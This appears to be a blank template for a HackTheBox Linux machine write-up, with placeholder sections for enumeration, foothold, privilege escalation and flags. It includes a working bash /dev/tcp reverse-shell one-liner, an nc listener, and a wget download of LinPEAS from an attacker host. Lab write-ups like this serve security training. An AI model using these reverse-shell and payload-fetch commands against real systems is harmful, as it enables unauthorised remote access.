← Back to Writeups
{{title}} icon

{{title}}

HackTheBox Medium Linux January 23, 2026
web

Machine Information

Property Value
Name  
OS Linux
Difficulty Medium
IP 10.10.11.x

Summary

TL;DR Brief one-paragraph summary of the box - what vulnerabilities were exploited and key techniques used.

Key Vulnerabilities:

  • Vulnerability 1
  • Vulnerability 2
  • Vulnerability 3

Enumeration

Nmap Scan

Initial scan:

nmap -vv -T5 -p- *TARGET_IP*

nmap -vv -T5 -p*DISOVERED_PORTS* -sC -sV *TARGET_IP*

Results:

Port Service TCP/UDP
22 SSH TCP
     

Key findings:

  • Service 1: Description
  • Service 2: Description

Web Enumeration

Directory brute-forcing:

gobuster dir -u http://10.10.11.x -w /usr/share/wordlists/dirb/common.txt

Discovered endpoints:

  • /admin - Admin panel
  • /api - REST API
  • /uploads - File upload directory

Technology stack:

  • Framework:
  • Language:
  • Database:

Port XXX Enumeration

Initial Foothold

Vulnerability Discovery

Vulnerability: [Vulnerability Name]

Details Explain the vulnerability - what it is, why it exists, how it works

Testing the vulnerability:

# Commands used to test/verify the vulnerability

Proof of Concept:

# Exploit code or script
import requests

url = "http://10.10.11.x/vulnerable-endpoint"
payload = {}

response = requests.post(url, data=payload)
print(response.text)

Exploitation

Step 1: [Action taken]

# Commands

Step 2: [Next action]

# Commands

Getting a shell:

# Reverse shell command
bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'

Listener:

nc -lvnp 4444
Shell Successfully gained shell as [username]

User Flag

Stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg

Enumerate the system:

whoami
id
uname -a
pwd
ls -la

User flag location:

cat /home/user/user.txt
flag{user_flag_here}

Privilege Escalation

Enumeration as [username]

Check sudo privileges:

sudo -l

Check for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Check for interesting files:

find / -name "*.conf" 2>/dev/null | grep -v "proc\|sys"

Running LinPEAS:

# On attacker machine
python3 -m http.server 8000

# On target
wget http://10.10.14.x:8000/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

Lateral Movement (if applicable)

Discovery Explanation of how to move laterally

Exploitation:

# Commands to switch users

Root Escalation

Vulnerability: [Escalation method]

Exploitation Path Detailed explanation of the privilege escalation vulnerability

[!warning] Exploitation Path Detailed explanation of the privilege escalation vulnerability

Exploitation steps:

Step 1:

# Command

Step 2:

# Command

Step 3:

# Command
Root Access Successfully escalated privileges to root

Root Flag

whoami
# root

cat /root/root.txt
flag{root_flag_here}

Post-Exploitation

Flags:

  • User: flag{user_flag_here}

  • Root: flag{root_flag_here}

    Tools Used

Tool Purpose Command/Usage
nmap Port scanning nmap -sC -sV target
gobuster Directory enumeration gobuster dir -u URL -w wordlist
burpsuite Web traffic analysis Interactive
linpeas Linux enumeration ./linpeas.sh
custom exploit Specific vulnerability python3 exploit.py

References

Timeline

graph LR
    A[Nmap Scan] --> B[Web Enum]
    B --> C[Vuln Discovery]
    C --> D[Initial Shell]
    D --> E[User Flag]
    E --> F[PrivEsc Enum]
    F --> G[Root Shell]
    G --> H[Root Flag]

Pwned on: [Date Here]
Difficulty Rating: ⭐⭐⭐⭐⭐ (Personal rating)
Fun Factor: ⭐⭐⭐⭐⭐ (How enjoyable was it?)